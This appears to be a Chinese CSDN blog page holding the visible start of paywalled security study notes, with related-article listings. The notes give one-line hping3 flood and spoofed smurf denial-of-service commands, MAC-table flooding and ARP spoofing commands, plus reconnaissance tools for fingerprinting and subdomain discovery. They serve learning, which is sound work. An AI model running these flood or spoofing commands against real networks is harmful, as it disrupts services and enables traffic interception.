网络安全知识点梳理(二)

VIP文章 已于 2023-01-30 17:57:33 修改
阅读量4k 收藏 1
点赞数
分类专栏: HTB 文章标签: web安全 网络安全
于 2022-04-15 15:06:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46566083/article/details/124195038
版权

信息收集

  • DOS攻击

hping3 -q -S -n --rand-source -p 80 --flood ip                           //TCP

hping3 -q -n -a 1.1.1.1 --udp -s 53 -p 80 --flood ip -d 1000   //udp

hping3 --icmp -c 1 --spoof 192.168.0.111 192.168.0.255     //smurf icmp

macchanger -e -a eth0    //交换机地址表攻击

  • 欺骗

arpspoof -i eth0 -t ip ip  //arp 欺骗

  • 定义

网站指纹:网站系统名称和版本;广义上包括网站,中间件,操作系统的版本信息。

  • 信息收集

1命令

whois url 收集域名信息

whatweb url   扫描网站指纹

wafw00f url

dirb url

theHarvester -d url -b 搜索引擎

fierce --domain url  //通过dns注册信息获得子域名

2网址:

ping.chinaz.com           //判断是否有cdn 获得ip

dnsdumpster.com       //通过dns注册信息获得子域名

最低0.47元/天 解锁文章
在奋斗的大道上
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
LTE知识点梳理一网络架构及协议修改版.docx
11-18
LTE知识点梳理一网络架构及协议修改版.docx
网络安全七大赛道:全面梳理(重磅深度)
Julia & Rust & Python
07-16 6906
网络安全七大赛道:全面梳理(重磅深度) 原创 方闻千 计算机方略 昨天 本文来自方正证券研究所于2021年7月14日发布的报告《网络安全行业七大核心赛道全面梳理》,欲了解具体内容,请阅读报告原文。方闻千S1220517040005 / 18717854750。 核心观点 国内网络安全产业即将迈入千亿规模,是计算机板块增速最快的子行业之一。目前,网络安全已经成为网络、计算、存储外的第四大IT基础设施,根据Gartner的数据统计,2020年全球安全市场规模达1238亿美元。而国内安全市场,从2013年开始,随
子域名探测
kangzinian的博客
04-14 821
信息收集对于渗透测试前期来说是非常重要,对于目标站点较为安全的时候我们往往选择寻找子域名进行渗透测试 子域名的形式: zkaq.org 顶级域名(一级) a.zkaq.org 级域名 b.a.zkaq.org 三级域名 通过点的个数来判断是几级域名 DNS解析就是通过dns服务器把域名解析为IP 子域名子域名:我们可以把子域名下的站点当成一个独立的站带你,但是可能防止同一台服务器上 当...
【转载】发生「null参数报错」的正确解决方法 | 亲子课堂 第 13 课
codecombat163的博客
01-02 1117
森林 地牢里的关卡主要是偏向锻炼用户的基本语法结构和计算机思维,让大家熟悉极客战记的操作与代码的使用。 来到了森林,关卡将会变得更多更难,同样,到了森林,大家就正式开始接触编程的几大重要知识点: 条件判断 运算符 函数 对象属性 无箭狼 关卡简介: 「无箭狼」这是一个非常简单的关卡,但不少同学在闯关的时候容易误解关卡意思,导致卡关。 通关展示: 思路讲解 本关的通关目标是收集15个蘑菇。...
在SQL Server中,当你处理Unicode字符串常量的时候,你必须在所有Unicode字符串前添加N前缀
Hoxily的窝窝
03-13 3144
You must precede all Unicode strings with a prefix N when you deal with Unicode string constants in SQL Server When dealing with Unicode string constants in SQL Server you must precede all Unicode st
网络安全知识点梳理(期末不挂科)
ZTLJQ的博客
06-14 7229
可信计算机系统是指在计算机系统设计、实现和运行过程中,通过一系列安全措施确保系统的可靠性、保密性、完整性和可用性。创新内容:可信执行环境(TEE)详细解析:可信执行环境是一种硬件和软件相结合的安全技术,提供一个可信的执行环境,保护应用程序和数据不受恶意软件和攻击的影响。密码是一种将可读明文转换为不可读密文的算法或方法。密码的作用是确保信息的机密性、完整性和可用性,防止未经授权的访问和数据篡改。行列式是一个用于方阵的特殊函数,用于计算方阵的某种性质。
网络安全比赛知识点梳理小记
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
10-12 3590
目录 信息安全基础知识 Windows操作系统 Linux系统安全 网络应用安全 病毒分析 信息安全基础知识 1.1 信息安全基本知识 信息安全的定义 信息安全是指信息网络的硬件、软件及其系统中的数据受到保护,不受偶然的或者恶意的原因而遭到破坏、更改、泄露,系统连续可靠正常地运行,信息服务不中断。 信息安全的评估准则 可信计算系统评估准则(TCSEC),是全球公认的第一个计算机信息系统评估标准。 BS7799信息安全管理标准是英国制定的 安全威胁 信息窃取是指未经授权的攻击.
信息安全导论知识点梳理
物联黄同学的博客
01-09 4501
画了五张mind-map
网络安全学科复习知识点个人整理
maybe_I_am_Qiu的博客
06-05 1826
普通大学生的期末备考网络安全专业课的重点复习整理。
【网络基础知识】网络基础知识点归纳梳理
holysll的博客
07-07 1712
1. 常用的网络传输协议 TCP:传输控制协议,可靠传输,面向连接 UDP:用户数据包协议,不可靠传输,面向无连接 FTP:文件传输协议,用于上传和下载文件 HTTP:超文本传输协议,基于TCP/IP通信协议,面向对象 SMTP:邮件传输协议 TELNET:Internet远程登录服务的标准协议和主要方式 DNS:域名系统,将域名解析为ip地址 2. ICMP协议与IGMP协议 ICMP(Internet Control Message Protocol)Internet控制报文协议,是一种面向无连接
Empire知识点梳理
09-25
Empire笔记、思维导图
wulianhuangtonxue#wulianhuangtonxue.github.io#2022-1-9-信息安全知识点梳理
07-25
前言马上要考信安了,梳理一波知识点第一章 概述第章 密码学概述第三章 数字签名与身份认证第四章PKI技术第九章网络安全技术后话冲冲冲!
密码编码学与网络安全 知识点.png
03-12
密码编码学与网络安全 核心理论知识梳理
CISSP重点知识点合集(第2版)
06-10
CISSP CBK教材重点知识点梳理: 一、安全和风险管理, 、资产安全, 三、安全工程, 四、通信与网络安全, 五、身份与访问管理, 六、安全评估与测试, 七、安全运营, 八、软件开发安全
网络安全之密码学技术
缘友一世的博客
04-29 1300
在DES算法中,明文按64位进行分组(块),密钥长度也是64位,(事实上只有56位参与DES运算,第8、16、24、32、40、48、56、64位是校验位, 使DES的每个密钥都有奇数个1),分组后的每64位明文组(块)分别与56位密钥进行多轮置换(按位替代/交换),最后生成64位的密文组(块)。RSA密钥是(公钥+模值)、(私钥+模值)成组分发的,单独一个公钥或私钥是没有用处,所以所谓的“密钥”其实是它们两者中的一个。IDEA是作为迭代的分组密码实现的,使用128位的密钥和8个循环。
网络安全思考题
weixin_62304542的博客
04-27 1306
网络安全渗透思考题
Forrester发布2024年五大网络安全新威胁
最新发布
qq_41432686的博客
05-01 975
人工智能正重塑网络安全格局,武器化大语言模型正成为首选攻击工具,安全团队在应对武器化人工智能攻击方面将面临日益严峻的挑战。Forrester近日发布《2024年网络安全威胁预测报告》指出,人工智能正重塑网络安全格局,武器化大语言模型正成为首选攻击工具,安全团队在应对武器化人工智能攻击方面将面临日益严峻的挑战。
网络安全的重要性及人才需求
yj520400的博客
04-29 891
能从事政府部分的安全规范和安全管理,包括法律的制定,也能从事安全企业的安全产品的研发,还能从事一般企业的安全管理和安全防护,国与国之间的空间安全的协调。这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。如果你把每周要学的内容精细化到这种程度,你还会担心学不会,入不了门吗,其实说到底就是学了两个月,但都是东学一下,西学一下,什么内容都是浅尝辄止,没有深入进去,所以才会有学了2个月,入不了门这种感受。因为漏洞是依赖于产品的,产品更新换代,漏洞也会更新换代。
网络安全等保知识梳理
09-02
网络安全等保知识的梳理可以包括以下几个方面: 1. 物理安全:确保网络设备所处的场地和设备本身的安全。包括设备防盗、设备防毁、防止电磁信息泄露、防止线路截获、抗电磁干扰和电源保护等。 2. 技术安全:在控制...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值